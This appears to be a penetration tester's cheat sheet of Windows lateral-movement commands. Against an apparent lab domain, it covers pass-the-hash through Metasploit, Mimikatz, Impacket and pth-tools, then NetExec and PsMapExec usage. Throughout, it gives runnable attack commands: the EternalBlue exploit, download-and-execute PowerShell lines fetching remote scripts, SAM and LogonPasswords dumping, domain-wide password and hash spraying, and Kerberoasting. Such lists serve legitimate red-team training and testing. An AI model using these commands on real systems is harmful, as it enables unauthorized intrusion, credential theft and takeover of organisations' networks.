MSF (Metasploit Framework)
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/psexec
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38
Impacket
#SMB
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig
#WMI
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
#win
wget <https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1>; Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\\hacked" -Verbose
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
#RPC
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
pth-net rpc share list -U 'ignite\\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105
#Other
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 <http://192.168.1.105/file.txt>
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected] whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected] query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s
SMB Relay Attack Script
git clone <https://github.com/m4lal0/smbrelay>
cd smbrelay; chmod +x smbrelay.sh
./smbrelay.sh --install
MUT
❌ CrackMapExec - no longer maintained (superseded by NetExec, installed below)
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
//Start
- NetExec
- nxc
- nxcdb
- netexec
#DB
nxcdb help
workspace list
workspace HTB
proto smb
#Usage
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | grep '[+]'
#Passwords Policy
crackmapexec smb targets.txt -u User -p P@ssw0rd --pass-pol
crackmapexec smb targets.txt -u User -p P@ssw0rd --local-groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --users
✅ PsMapExec (Windows)
IEX(New-Object System.Net.WebClient).DownloadString("<https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1>")
//Start
# Execute WMI commands over all systems in the domain using password authentication
PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami
# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami
# Check RDP access against workstations in the domain using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
# Dump SAM on a single system using SMB, authenticating with a ticket (-Ticket)
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList
# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords
# Use WMI to check the current user's admin access on systems listed in a text file
PsMapExec -Targets C:\\temp\\Systems.txt -Method WMI
# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]
# Spray Hashes across all accounts in the domain that have AdminCount=1
PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]
# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]
# Kerberoast
PsMapExec -Method Kerberoast -ShowOutput
# IPMI
PsMapExec -Targets 192.168.1.0/24 -Method IPMI